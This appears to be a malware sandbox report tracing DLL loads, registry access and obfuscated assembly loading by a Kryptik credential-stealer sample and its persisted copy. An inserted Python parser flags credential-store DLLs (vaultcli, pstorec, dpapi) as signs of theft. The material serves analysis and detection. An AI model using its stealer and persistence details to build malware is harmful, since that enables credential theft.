Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: winmm.dll
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: wininet.dll
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: rstrtmgr.dll
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: version.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: wininet.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: wldp.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: profapi.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: pstorec.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: wldp.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: pstorec.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: wldp.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: cryptbase.dll
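Added example (not part of the Joe Sandbox report): a small parser for the "Section loaded" lines above that groups DLLs by process and flags the credential-store libraries (pstorec.dll, vaultcli.dll, dpapi.dll) the sample pulls in near the end of the list, the same libraries a mail-, vault- and browser-credential stealer needs. The DLL-to-capability table and the "two of three" rule are the editor's assumptions, not Joe Sandbox signature logic; the sample lines are constructed from entries on this page, including the fused "exeSection loaded:" spelling and the "Jump to behavior" link text that extraction leaves behind.

```python
import re
from collections import defaultdict

# Constructed sample in the report's own line layout (paths and DLL names are
# taken from this report; the set of lines is trimmed to a handful of entries).
SAMPLE_LINES = r"""
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Section loaded: pstorec.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Section loaded: vaultcli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Section loaded: pstorec.dll
Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
"""

# Tolerates both "exe Section loaded:" and the fused "exeSection loaded:" form,
# and ignores the trailing "Jump to behavior" link text.
LOAD_RE = re.compile(
    r"Source:\s*(?P<proc>.+?\.exe)\s*Section loaded:\s*(?P<dll>[\w.\-]+\.dll)",
    re.IGNORECASE,
)

# Editor's assumption: what loading each library usually means for a sample.
CAPABILITY_HINTS = {
    "vaultcli.dll": "Credential Manager (vault) client: reads stored web/Windows credentials",
    "pstorec.dll": "legacy Protected Storage: old Outlook/IE saved passwords",
    "dpapi.dll": "CryptUnprotectData: decrypts DPAPI-protected secrets",
    "wininet.dll": "WinINet HTTP client: likely C2 or download channel",
    "winhttp.dll": "WinHTTP client: likely C2 or download channel",
    "amsi.dll": "AMSI scan hook: in-memory assembly or script load",
    "taskschd.dll": "Task Scheduler COM: scheduled-task persistence",
}
CREDENTIAL_STORE_DLLS = ("vaultcli.dll", "pstorec.dll", "dpapi.dll")


def parse_section_loads(text):
    """Map each process path to the ordered, de-duplicated list of DLLs it loaded."""
    loads = defaultdict(list)
    for m in LOAD_RE.finditer(text):
        proc, dll = m.group("proc"), m.group("dll").lower()
        if dll not in loads[proc]:
            loads[proc].append(dll)
    return dict(loads)


def credential_access_suspects(loads, minimum=2):
    """Processes loading at least `minimum` of the credential-store DLLs.
    Two is the assumed cut-off: a lone dpapi.dll load is common in benign code."""
    return sorted(
        proc for proc, dlls in loads.items()
        if sum(d in dlls for d in CREDENTIAL_STORE_DLLS) >= minimum
    )


def explain(loads):
    """Per process, the subset of loaded DLLs that carry a capability hint."""
    return {
        proc: [(d, CAPABILITY_HINTS[d]) for d in dlls if d in CAPABILITY_HINTS]
        for proc, dlls in loads.items()
    }


if __name__ == "__main__":
    parsed = parse_section_loads(SAMPLE_LINES)
    for proc, hints in explain(parsed).items():
        print(proc)
        for dll, why in hints:
            print(f"    {dll:<14} {why}")
    print("credential-access suspects:", credential_access_suspects(parsed))
```

Run against the full report text the same parser shows the Desktop copy of the sample loading pstorec.dll, vaultcli.dll and dpapi.dll in one process, while the Roaming copy (the persisted drop) only loads the CLR, crypto and HTTP libraries.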
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | File opened: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.cfg
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Static file information: File size 1144840 > 1048576
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x10f400
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4f00000.4.raw.unpack, Uo.cs | .Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, qVTa4C2qFjWp91p9EE.cs | .Net Code: R5tfS8mNbg System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, qVTa4C2qFjWp91p9EE.cs | .Net Code: R5tfS8mNbg System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, qVTa4C2qFjWp91p9EE.cs | .Net Code: R5tfS8mNbg System.Reflection.Assembly.Load(byte[])
                    Source: 10.2.mXJeXQoaGktJCW.exe.4eae1f0.0.raw.unpack, qVTa4C2qFjWp91p9EE.cs | .Net Code: R5tfS8mNbg System.Reflection.Assembly.Load(byte[])
                    Source: 10.2.mXJeXQoaGktJCW.exe.4f68810.1.raw.unpack, qVTa4C2qFjWp91p9EE.cs | .Net Code: R5tfS8mNbg System.Reflection.Assembly.Load(byte[])
